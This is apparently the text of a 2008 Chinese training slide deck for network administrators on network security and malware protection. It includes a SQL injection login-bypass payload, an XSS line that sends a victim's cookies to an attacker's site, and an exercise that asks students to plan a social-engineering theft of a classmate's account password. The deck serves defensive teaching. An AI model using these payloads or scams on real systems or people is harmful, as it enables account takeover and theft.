2008網(wǎng)管寒訓網(wǎng)路安全與病毒防護.ppt

2008 網(wǎng)管寒訓 網(wǎng)路安全與病毒防護,報告人：朱哥 NCU MENG 2008/1/15,喇賽時間,為什麼要談資訊安全? 近來發(fā)生的問題 今日作業(yè),網(wǎng)路安全,網(wǎng)路安全基本介紹,網(wǎng)路安全的基本需求 網(wǎng)路面臨的問題 網(wǎng)路的安全威脅,網(wǎng)路安全的基本需求,傳輸?shù)谋Ｃ苄?(confidentiality) 資料的完整性 (integrity) 身分的鑑別與認證 (authentication) 雙方的不可否認性 (nonrepudiation),網(wǎng)路面臨的問題,病毒蠕蟲攻擊 網(wǎng)路癱瘓 垃圾郵件 機密外洩 非法入侵 即時通訊 (MSN.) back,網(wǎng)路的安全威脅,系統(tǒng)、漏洞不斷被發(fā)現(xiàn)，攻擊手法不斷翻新 更新的速度永遠比不過感染的速度 病毒變種快速 攻擊程式及後門程式氾濫 廣告郵件、垃圾訊息及色情網(wǎng)站充斥整個網(wǎng)路 非法下載 即時通訊,隨堂練習,請從網(wǎng)路找出一個近年來的網(wǎng)路攻擊事件 的新聞，並簡單判別它是以上提到的哪種問題?,提高網(wǎng)路連線的安全性,資料加密 (Data Encryption) 明文(plain text) 密文 (cipher text) 認證 (Authorization) 通常是要求使用者輸入帳號密碼 權(quán)限設定 (Authentication) 稽核(Auditing) 提供過去事件的相關紀錄利於事後追蹤,典型密碼系統(tǒng),發(fā)送方,接收方,加密演算法,解密演算法,加密金鑰,解密金鑰,明文,密文,明文,網(wǎng)路安全設備,入侵防禦系統(tǒng) ( IPS & IDS ) 防火牆（Firewall ) 防毒系統(tǒng) ( Anti-Virus ),Firewall,安裝在兩個網(wǎng)路間的裝置 藉著過濾掉某些不可靠的資料封包來增加系統(tǒng)的安全性 提供稽核與控制存取等服務,Firewall 的基本功能,認證 ( UA, User Authentication ) 預警功能 ( Alert ) 記錄與記錄分析工具 ( Log & Log Analyzer ) 通訊埠的權(quán)限設定,Firewall 的缺點,易形成網(wǎng)路上的交通瓶頸 無法防止內(nèi)部網(wǎng)路的使用者用其合法的身分做破壞系統(tǒng)的行為 不一定能阻止開後門 無法有效阻止有心人士利用原作業(yè)系統(tǒng)的漏洞進行入侵破壞行為 不提供資料完整性驗證,三大 Firewall 類型,1. 封包過濾式 2. 應用層閘道式 3. 電路層閘道式,封包過濾式防火牆,應用於網(wǎng)路層 針對每個封包的標頭提供的資訊加以查核 優(yōu)點： 1. 完全通透性 2. 速度快 缺點： 1. 無法有效防止IP欺騙 2. 有些應用協(xié)議不適用 ( EX. HTTP ),隨堂練習,1. 請去網(wǎng)路上找出另外兩種防火牆的簡介， 並列出兩種防火牆的優(yōu)缺點 2. 請完成以下表格,防火牆,Comodo 個人防火牆 McAfee Personal Firewall,入侵偵測系統(tǒng) IDS,架設在網(wǎng)路節(jié)點與主機間的針孔攝影機 若防火牆是第一道防線 IDS就是第二道防線 可以監(jiān)控用戶和系統(tǒng)的所有活動 將封包拆開分析再重新組合,隨堂練習,使用IDS是否真的萬無一失? 請查閱網(wǎng)路資料並列出IDS的缺點,防毒軟體,以特徵碼和行為模式辨別病毒、木馬 並不能 100% 阻擋病毒的入侵 ( 因為病毒變種過於快速 ) 不怕一萬，只怕萬一 定期更新病毒碼、主程式,網(wǎng)路的基本運作原理,Internet 世界,TCP/IP 協(xié)定,Windows,Port 80,Port 110,Port 25,Port ?,Port 的角色與功能,電腦進出 Internet 的大門 一般來說，每個網(wǎng)路軟體都可以打開任一 個 Port ，但為了傳輸順暢，某些軟體就會 固定使用某幾個 Port 所以沒用到、不常用的幾個 Port 就容易成為駭客入侵最常使用的 Port,隨堂練習,請找出以下幾個程式或協(xié)定所使用的 Port 1. FTP 6. HTTP 2. Telnet 7. DHCP 3. SMTP 4. POP3 5. 網(wǎng)路芳鄰,駭客入侵,駭客入侵的對象,Server 個人!,常見的攻擊手法 ( Server ),猜密碼 利用系統(tǒng)的程式漏洞主動攻擊 利用程式功能的被動攻擊 rootkit蠕蟲或木馬 社交工程 DoS ( Denial of Service ) XSS ( Cross-Site Scripting ),猜密碼,取得帳號資訊後猜密碼 常見帳號 admin, administrator, webmaster Brute force ( 暴力法 ) 利用字典檔進行無數(shù)次試驗,猜密碼,初級 cracker 會使用的方式之一 WINRAR password recovery 費時 防護： 1. 建立較嚴格的密碼設定規(guī)則 2. 密碼輸入次數(shù)限制 back,利用系統(tǒng)的程式漏洞主動攻擊,軟體撰寫方式的問題 bug ( 可能會造成系統(tǒng)的不穩(wěn)定或當機 ) Security ( 程式碼撰寫方式會導致系統(tǒng)的使用權(quán)限被惡意者所掌握 ) cracker 會嘗試撰寫一些針對這個漏洞的攻擊程式 攻擊者只要拿到攻擊程式就可以進行攻擊 SQL injection,SQL injection ( 資料隱碼 ),利用使用者輸入的東西來控制你的 SQL Example : select * from member where UID = “& request(“ID“) &“ And Passwd = “& request(“Pwd“) & “ 正常： select * from member where UID=A123456789 And Passwd=1234,SQL injection,使用者帳號 or 1=1 -， 密碼隨便打 結(jié)果： select * from member where UID = or 1=1 - And Passwd = asdf1234 邏輯成立 跳過驗證密碼過程 ( p.s. - 符號後的任何敘述都會被當作註解 ),隨堂練習,請運用剛剛所提到的內(nèi)容 寫出一段資料隱碼攻擊的程式碼,利用系統(tǒng)的程式漏洞主動攻擊,最常見 不需要猜密碼 由攻擊開始到取得你系統(tǒng)的 root 權(quán)限不需要兩分鐘，就能夠立刻入侵成功 防護： 1. 關閉不需要的網(wǎng)路服務 & Port 2. 隨時保持更新 back,利用程式功能的被動攻擊,惡意網(wǎng)站提供軟體下載與安裝 瀏覽器主動的答應對方 WWW 主機所提供的各項程式功能， 或者是自動安裝來自對方主機的軟體 瀏覽器漏洞讓對方得以傳送惡意程式碼給你的主機來執(zhí)行 ActiveX 主動式內(nèi)容 ( IE core )： EX.讀寫檔案、病毒掃瞄等 但是有讓對方網(wǎng)站控制本機的危險,利用程式功能的被動攻擊,防護： 1. 隨時更新 2. 讓瀏覽器在安裝軟體時，要通過你 的確認後才安裝 3. 不要連上惡意網(wǎng)站 (難 !) back,rootkit蠕蟲或木馬,蠕蟲 ( Worm ) 惡性程式碼感染整個網(wǎng)路 木馬間諜程式 ( Trojan ) 附著在可執(zhí)行檔案裡開後門爽 ( 側(cè)錄、跳板、破壞. ) Rootkit 即為取得root權(quán)限的工具包 途徑：漏洞與社交工程等,社交工程 (Social Engineering),簡介 過人與人的互動來達到入侵 的目的 偽裝、謊言 時間可能長以年計 釣魚法 推薦書目：藍色駭客 ( 出版社：皇冠文化 ) MSN photo 系列病毒,社交工程 (Social Engineering),防護： 1. 帳號密碼記在腦子裡不要說 2. 不要隨便相信他人 ( ? ) 3. 追蹤對談者 back,隨堂練習,情境題：如果你是一個駭客，你會怎樣利用社交工程來騙取現(xiàn)在坐在你旁邊同學的郵局帳號密碼 ? ( 請用50100字簡單敘述流程 ),DoS ( Denial of Service ),阻斷式攻擊 SYN：當主機接收了一個帶有 SYN 的 TCP 封包之後，就會啟用對方要求的 port 來等待連線 SYN flood：透過軟體功能，在短短的時間內(nèi)持續(xù)發(fā)送出SYN 封包， Server 就會持續(xù)不斷的發(fā)送確認封包，並且開啟大量的 port 在空等 CPU使用率飆高、頻寬被吃光 掰 機關槍打坦克,補充: 三方交握 ( Three-Way Handshaking ),Client端發(fā)出連線要求時，必須要提供下列資訊： Client自己的IP 位址 所使用的Port號 最大容許的 TCP Segment大小 其他訊息 三方交握： 1. Clioent想要與Server連線，因此Host1將SYN旗標設定為1，同時將目前的Segment序號(x)傳送給Host2。 2. Server接收到此要求後，會對此連線要求加以回應，因此將SYN設定為1，此外附上目前序號(y)，及確認序號(x+1)給Client。（在此，確認號碼為發(fā)送端序號加一）。 3. Client收到此訊號後，會將序號設定為(x+1)，然後確認序號設定為(y+1)。（確認序號仍為對方的序號加一）。,DDoS (Distributed Denial of Service),進化版 集合眾人之力 先散播惡意軟體 ( 透過後門等方式 ) 同步所有攻擊程式，於同時間朝同目標 攻擊 效率為 DoS 的數(shù)倍 單純惡意行為 ( 不是為了取得root ) 目前無較好方法防堵,back,Cross-Site Scripting ( XSS ),跨站腳本攻擊 十大攻擊之首 利用網(wǎng)站上允許使用者輸入字元或字串的欄位插入HTML與Script語言 利用釣魚式攻擊 將使用者的cookie資料導入到駭客網(wǎng)站並儲存 無名小站 ( 2006 ),Cross-Site Scripting ( XSS ),EX. location.replace(/?secret=+document.cookie) 防護 1. Black List 缺點：過濾不乾淨 2. White List 缺點：Client 變化性少,隨堂練習,請從網(wǎng)路上找出一種阻斷式攻擊的方法 ( 講義上沒提到的 ),病毒與木馬防護,木馬 ?,木馬 病毒 傻傻分不清楚,病毒 進入電腦中進行軟硬體的損壞、無 法操作等破壞行為 木馬 進入電腦中蒐集各種資訊，甚至完 全控制寄主,木馬的功用,遠端遙控 轉(zhuǎn)向入侵 ( or 跳板 ) 截取封包 獲得帳號密碼 DDoS,木馬怎麼防 ?,最佳方式 不要讓它植入你的電腦 不幸中了怎麼辦 ? 1. 想辦法清除 2. 利用之前的備份重灌,簡易中毒自救法,1. 先拔網(wǎng)路線 2. 使用防毒軟體檢察 3. 檢查開機自動執(zhí)行與系統(tǒng)服務 4. 檢查已執(zhí)行的程式 5. 查看Port連線情況 6. 上網(wǎng)求救 - 進階： 監(jiān)控封包,使用防毒軟體檢察,平時就要定期更新病毒碼 防毒軟體只是疫苗，不一定是解藥 p.s. Spybot Search & Destroy,檢查開機自動執(zhí)行,1. 啟動資料夾,檢查開機自動執(zhí)行,2. Win.ini 或是 System.ini 在Windows的資料夾裡 Win.ini 通常不會有任何的 run 和 load 參數(shù) System.ini 裡的shell參數(shù)的 Explorer.exe不會有 別的程式名稱,檢查開機自動執(zhí)行,3. 檢察機碼 ( Registry ) 執(zhí)行regedit HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunOnce HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRun HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionRunOnce 通常只有系統(tǒng)運行所需之程式或是自己灌的應用程式 Startup /files/StartupCPL.zip,HKEY_USERSS-1-5-21-SoftwareMicrosoftWindow NTCurrentVersionWindows 裡面通常沒有run的機碼 HKEY_LOCAL_MachineSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon 裡面的Shell機碼值應該只有 explorer.exe,檢察系統(tǒng)服務,控制臺系統(tǒng)服務 停用可疑或自己不認識的服務,檢查已執(zhí)行的程式,工作管理員 TaskInfo ( 共享軟體 ) 可以上網(wǎng)查不知道是什麼的程式 /taskmanager/process/index.html /directory/ 一些WinXP的系統(tǒng)程式： smss.exe lsass.exe csrss.exe winlogon.exe Explore.exe regsvc.exe svchost.exe(會有很多個) 進入安全模式將可疑執(zhí)行檔刪除,查看Port狀況,CurrPort /utils/cports.html 將可疑程式的位置鎖定後刪除,隨堂作業(yè),請去網(wǎng)路上找出以下幾個程式的發(fā)行公司 及用途 alg.exe mplaye